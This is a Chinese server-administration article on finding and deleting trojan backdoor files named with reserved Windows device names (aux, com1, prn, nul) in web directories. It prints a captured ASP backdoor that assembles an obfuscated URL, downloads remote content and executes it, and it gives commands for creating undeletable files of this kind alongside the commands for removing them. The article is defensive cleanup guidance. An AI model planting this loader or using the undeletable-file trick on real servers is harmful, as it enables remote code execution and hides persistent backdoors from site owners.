首页服务器Web服务器 com1/lpt1/prn/nul 木马后门处理方法集合

com1/lpt1/prn/nul 木马后门处理方法集合

删除命令

rd /s //./E:/webhosting/wwwroot/prn.0418EE4F 复制代码 代码如下:…

删除命令

rd /s //./E:/webhosting/wwwroot/prn.0418EE4F

复制代码 代码如下:


<%
'by*aming
dim amxml,amtxt,amado
amtxt="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&"/"&"b"&"o"&"t"&"/"&"c"&"o"&"n"&"f"&"i"&"g"&"."&"t"&"x"&"t"
Set amxml=CreateObject("Microsoft.XMLHTTP")
amxml.Open "Get",amtxt,False,"",""
amxml.setRequestHeader "User-Agent",amtxt
amxml.Send
set amado=Server.CreateObject("adodb.stream")
amado.Type=1
amado.Mode=3
amado.Open
amado.Write amxml.ResponseBody
amado.Position=0
amado.Type=2
amado.Charset="gb2312"
execute(amado.ReadText)
amado.Close
set amado=nothing
Set amxml=nothing
%>



近期有朋友发现自己的网站目录下多出许多类似 aux.asp com1.gupiao.asp 的文件或文件夹,无法删除!这类文件为何无法删除,怎样建立无法删除的文件,又如何删除 aux.asp 这类 无法删除的文件 呢?

服务器中 文件夹选项 - 查看 -隐藏受保护的操作系统文件后可看到此类文件属性均为RHSA系统文件,无法删除、修改、移动。

 Windows 下不能够以下面这些字样来命名文件/文件夹,包括:aux、com1、com2、prn、con、nul 等,因为这些名字都属于设备名称,等价于一个 DOS 设备,如果我们把文件命名为这些名字,Windows 就会误以为发生重名,所以会提示“不能创建同名的文件”。

当然,有一些特殊的方法可以投机取巧,建立以这些设备名为名的文件夹,比如我们在命令提示符下执行“md E:/COM1//”,就在E盘建了一个名叫 COM1 的文件夹。此文件夹虽然可以访问,也可以建立子文件夹,但却无法删除,在系统看来,这个 COM1文件夹就是设备。
那么,如何删除aux、com1等文件/文件夹呢?我们只要按照完整的 UNC 路径格式,就是网上邻居的路径格式,正确输入文件路径及文件名即可。比如要删除E 盘下的 aux 文件夹,可在命令提示符下执行:rd /s //./E:/aux,rd 带上/s 参数表示从所有子目录删除指定文件。再比如要删除 E 盘 aux文件夹下的 nul.exe 文件,在命令提示符下执行:del //./E:/aux/nul.exe 即可。

    采用del//./E:/PRN/aux.asp:.jpg的方式,失败了,最后将其他jpg文件移走,使用rd方式删除整个目录 看图:

 

删除aux文件命令

注意尾部加“//”不然会出现正常文件夹也出现如图中的1文件夹无法访问的情况,重启后文件夹才会消失。

其他这种文件的删除特殊文件资料。

可以在dos中删除,在开始输入以下命令:

下面是删除test用户中的null目录中所有内容

echo y|rmdir //./D:/freehost/test/web/nul /s


如果有一些特殊文件,如aux.com.asp无法删除,只能先备份用户的web目录(备份时不要选中有问题的文件),再用以下命令删除web目录所有内容:

echo y|rmdir //./D:/freehost/test/web /s

要建立这类无法删除文件的方法也很简单:

 

copy 123.txt //./d:/aux.asp

建立不可删除的文件夹:

md //./d:/prn//

要删除这类‘无法删除的文件'也是有办法的,如:d:/wwwroot/web/www 是包含这些无法删除文件的目录。在执行命令前,把文件夹中需要备份的程序先移动到其他位置,然后使用以下命令可以删除。

rmdir //./d:/wwwroot/web/www /s /q

也可以使用下面的命令直接删除这些文件:

del //./d:/wwwroot/web/www/aux.asp

本文来自网络,不代表1号站长-站长学院|资讯交流平台立场。转载请注明出处: https://www.1cn.cc/fwq/web/7976.html
上一篇LoadUserProfile 调用因下列错误而宣告失败: 拒绝访问的常见解决方法
下一篇 Nginx+iptables屏蔽访问Web页面过于频繁的IP(防DDOS,恶意访问,采集器)
admin

作者: admin

这里可以再内容模板定义一些文字和说明,也可以调用对应作者的简介!或者做一些网站的描述之类的文字或者HTML!

为您推荐

评论列表()

    联系我们

    联系我们

    0898-88888888

    在线咨询: QQ交谈

    邮箱: email@wangzhan.com

    工作时间:周一至周五,9:00-17:30,节假日休息

    关注微信
    微信扫一扫关注我们

    微信扫一扫关注我们

    关注微博
    返回顶部